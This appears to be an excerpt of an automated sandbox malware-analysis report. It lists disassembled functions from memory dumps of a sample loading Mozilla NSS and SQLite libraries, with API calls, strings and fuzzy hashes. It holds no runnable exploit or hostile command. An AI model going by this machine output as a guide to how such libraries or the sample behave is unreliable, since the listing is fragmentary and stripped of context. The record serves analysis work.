                                                                                          • Instruction ID: 8e4dbfb736b9908720f30fe25f95c1a3b6087da1e007f902b0e4d68da9f23204
                                                                                          • Opcode Fuzzy Hash: 92af57a2eb04ab3802c4d219b965fa46d3e89a576cd6fa8fbae2cab6dd9d340f
                                                                                          • Instruction Fuzzy Hash: 8D9002B829111456561037719D896896D905ACC6137554861B405C4055EA9841849529
                                                                                          Function 6CB38EA0 Relevance: .1, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 210ebb6323ba87109a38f47270639335392eb7e1fc458a4c92123efc9fde2b1a
                                                                                          • Instruction ID: f1050509f07999a016d4d3a9a7e9cc1a2ac06d425bde4e869e1cb1906eb971ae
                                                                                          • Opcode Fuzzy Hash: 210ebb6323ba87109a38f47270639335392eb7e1fc458a4c92123efc9fde2b1a
                                                                                          • Instruction Fuzzy Hash: F211B272A012658BDB04CF25D88475AB7B5FF41318F04666BD809CFA81C776D886C7C3
                                                                                          Function 6CC10C40 Relevance: .1, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3d56803a93f92572e34b843fa51d27b41b50bbc9c9a8a73270c327209ac0842d
                                                                                          • Instruction ID: a830db2a5567ffa072c281ab3e3691f0e739f2ec800a73b9442028b45ad402e0
                                                                                          • Opcode Fuzzy Hash: 3d56803a93f92572e34b843fa51d27b41b50bbc9c9a8a73270c327209ac0842d
                                                                                          • Instruction Fuzzy Hash: 4111E774708305DFCB00DF1AC8906AA7BB1FF85368F14816DD8198BB01EB31E816DB91
                                                                                          Function 6CC10D60 Relevance: .0, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                          • Instruction ID: 2c281198b98c8ec42dcb9c37c9cb43de506ca3cedcb8d87b7fd9407e4f78e5d2
                                                                                          • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                                                          • Instruction Fuzzy Hash: 91E0923A21A454A7DB149E0AC451AA97359EF81619FB480FECC5D9FE01F733F8139781
                                                                                          Function 00419160 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                                                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                                                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                                                          Function 6CC16E50 Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 213stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CACCA30: EnterCriticalSection.KERNEL32(?,?,?,6CB2F9C9,?,6CB2F4DA,6CB2F9C9,?,?,6CAF369A), ref: 6CACCA7A
                                                                                            • Part of subcall function 6CACCA30: LeaveCriticalSection.KERNEL32(?), ref: 6CACCB26
                                                                                          • memset.VCRUNTIME140(00000000,00000000,?,?,6CADBE66), ref: 6CC16E81
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6CADBE66), ref: 6CC16E98
                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6CC7AAF9,?,?,?,?,?,?,6CADBE66), ref: 6CC16EC9
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6CADBE66), ref: 6CC16ED2
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6CADBE66), ref: 6CC16EF8
                                                                                          • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6CADBE66), ref: 6CC16F1F
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6CADBE66), ref: 6CC16F28
                                                                                          • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6CADBE66), ref: 6CC16F3D
                                                                                          • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6CADBE66), ref: 6CC16FA6
                                                                                          • sqlite3_snprintf.NSS3(?,00000000,6CC7AAF9,00000000,?,?,?,?,?,?,?,6CADBE66), ref: 6CC16FDB
                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6CADBE66), ref: 6CC16FE4
                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CADBE66), ref: 6CC16FEF
                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CADBE66), ref: 6CC17014
                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,6CADBE66), ref: 6CC1701D
                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6CADBE66), ref: 6CC17030
                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6CADBE66), ref: 6CC1705B
                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,6CADBE66), ref: 6CC17079
                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6CADBE66), ref: 6CC17097
                                                                                          • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6CADBE66), ref: 6CC170A0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                          • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                          • API String ID: 593473924-707647140
                                                                                          • Opcode ID: b5c3a75d93546dd74cdfefeeb167f1375fbcc7d60cb29b54c372a12107fafbee
                                                                                          • Instruction ID: 167196855138ca64961ab0cfd0b1442620dbaaa620aa6face3c3125c9a4f4ba1
                                                                                          • Opcode Fuzzy Hash: b5c3a75d93546dd74cdfefeeb167f1375fbcc7d60cb29b54c372a12107fafbee
                                                                                          • Instruction Fuzzy Hash: 005199B1B086115BE30096329C55FBB36269F9230CF140638E81697FC1FF25945E92D3
                                                                                          Function 6CBA4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB575C2,00000000,00000000,00000001), ref: 6CBA5009
                                                                                          • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB575C2,00000000), ref: 6CBA5049
                                                                                          • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CBA505D
                                                                                          • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6CBA5071
                                                                                          • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA5089
                                                                                          • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA50A1
                                                                                          • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CBA50B2
                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB575C2), ref: 6CBA50CB
                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CBA50D9
                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CBA50F5
                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA5103
                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA511D
                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA512B
                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA5145
                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBA5153
                                                                                          • free.MOZGLUE(?), ref: 6CBA516D
                                                                                          • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CBA517B
                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CBA5195
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                          • String ID: config=$library=$name=$nss=$parameters=
                                                                                          • API String ID: 391827415-203331871
                                                                                          • Opcode ID: b23501eb379a4ad9d0e788bb495668ce4c506e2e8322bd09c1baa03a4991f16a
                                                                                          • Instruction ID: 29c9d2f2fbc291e233fe34d1a166050e2decf8501abc23463706c07320d2aec9
                                                                                          • Opcode Fuzzy Hash: b23501eb379a4ad9d0e788bb495668ce4c506e2e8322bd09c1baa03a4991f16a
                                                                                          • Instruction Fuzzy Hash: 1851D6B1A455456BEB10DF64DC41AAF37B8EF06248F140020EC99E7741FB35EA1ACBB6
                                                                                          Function 6CB78E50 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 169COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_WrapKey), ref: 6CB78E76
                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB78EA4
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB78EB3
                                                                                            • Part of subcall function 6CC5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC5D963
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB78EC9
                                                                                          • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CB78EE5
                                                                                          • PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6CB78F17
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB78F29
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB78F3F
                                                                                          • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CB78F71
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB78F80
                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6CB78F96
                                                                                          • PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6CB78FB2
                                                                                          • PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6CB78FCD
                                                                                          • PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6CB79047
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                          • String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
                                                                                          • API String ID: 1003633598-4293906258
                                                                                          • Opcode ID: b75ed0e7db7dfba29f63209baf73cf964b3ac94b79b0e65aae8cc9ba13e3fba9
                                                                                          • Instruction ID: 87d32ab29851ae983ed2fef0e17056ad110af09cba9e9f45a0cd3a9701d08d03
                                                                                          • Opcode Fuzzy Hash: b75ed0e7db7dfba29f63209baf73cf964b3ac94b79b0e65aae8cc9ba13e3fba9
                                                                                          • Instruction Fuzzy Hash: 7851F231A01155ABDB109F51AD4CF9E3776EB4230DF484025FA18ABA11E7319868CBB6
                                                                                          Function 6CBA4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CB94F51,00000000), ref: 6CBA4C50
                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB94F51,00000000), ref: 6CBA4C5B
                                                                                          • PR_smprintf.NSS3(6CC7AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CB94F51,00000000), ref: 6CBA4C76
                                                                                          • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CB94F51,00000000), ref: 6CBA4CAE
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBA4CC9
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBA4CF4
                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CBA4D0B
                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB94F51,00000000), ref: 6CBA4D5E
                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CB94F51,00000000), ref: 6CBA4D68
                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CBA4D85
                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CBA4DA2
                                                                                          • free.MOZGLUE(?), ref: 6CBA4DB9
                                                                                          • free.MOZGLUE(00000000), ref: 6CBA4DCF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                          • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                          • API String ID: 3756394533-2552752316
                                                                                          • Opcode ID: effc88cfcabf9046680f1277b932072de27453e5985e1badb572372fb0e4b747
                                                                                          • Instruction ID: 97e1a1e0d80f26970692d45034ade5584c0ad389f654d9c4d0fab9f94ae7f63d
                                                                                          • Opcode Fuzzy Hash: effc88cfcabf9046680f1277b932072de27453e5985e1badb572372fb0e4b747
                                                                                          • Instruction Fuzzy Hash: F7418BB29041916BDB125F589841ABF3A75EF82348F044124EC5A5B701FB34DC26CBE3
                                                                                          Function 6CB82D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CB82DEC
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CB82E00
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CB82E2B
                                                                                          • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CB82E43
                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CB54F1C,?,-00000001,00000000,?), ref: 6CB82E74
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CB54F1C,?,-00000001,00000000), ref: 6CB82E88
                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB82EC6
                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB82EE4
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CB82EF8
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB82F62
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB82F86
                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6CB82F9E
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB82FCA
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB8301A
                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6CB8302E
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB83066
                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6CB83085
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB830EC
                                                                                          • TlsGetValue.KERNEL32 ref: 6CB8310C
                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6CB83124
                                                                                          • PR_Unlock.NSS3(?), ref: 6CB8314C
                                                                                            • Part of subcall function 6CB69180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CB9379E,?,6CB69568,00000000,?,6CB9379E,?,00000001,?), ref: 6CB6918D
                                                                                            • Part of subcall function 6CB69180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CB9379E,?,6CB69568,00000000,?,6CB9379E,?,00000001,?), ref: 6CB691A0
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307AD
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307CD
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CAC204A), ref: 6CB307D6
                                                                                            • Part of subcall function 6CB307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CAC204A), ref: 6CB307E4
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,6CAC204A), ref: 6CB30864
                                                                                            • Part of subcall function 6CB307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CB30880
                                                                                            • Part of subcall function 6CB307A0: TlsSetValue.KERNEL32(00000000,?,?,6CAC204A), ref: 6CB308CB
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(?,?,6CAC204A), ref: 6CB308D7
                                                                                            • Part of subcall function 6CB307A0: TlsGetValue.KERNEL32(?,?,6CAC204A), ref: 6CB308FB
                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6CB8316D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                          • String ID:
                                                                                          • API String ID: 3383223490-0
                                                                                          • Opcode ID: f5ef80a50525c2dcf6e5fdc522738859548393a20e301511c2987f84f718b858
                                                                                          • Instruction ID: d55720ec417807f26189d2f86922300abf03ca7615e59bba6c69c2884612b66f
                                                                                          • Opcode Fuzzy Hash: f5ef80a50525c2dcf6e5fdc522738859548393a20e301511c2987f84f718b858
                                                                                          • Instruction Fuzzy Hash: 25F16BB1D012599FDF00DFA8D888B9EBBB4FF09318F144169EC05A7711E731A995CB92
                                                                                          Function 6CB7AF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_LogPrint.NSS3(C_SignMessage), ref: 6CB7AF46
                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB7AF74
                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB7AF83
                                                                                            • Part of subcall function 6CC5D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC5D963
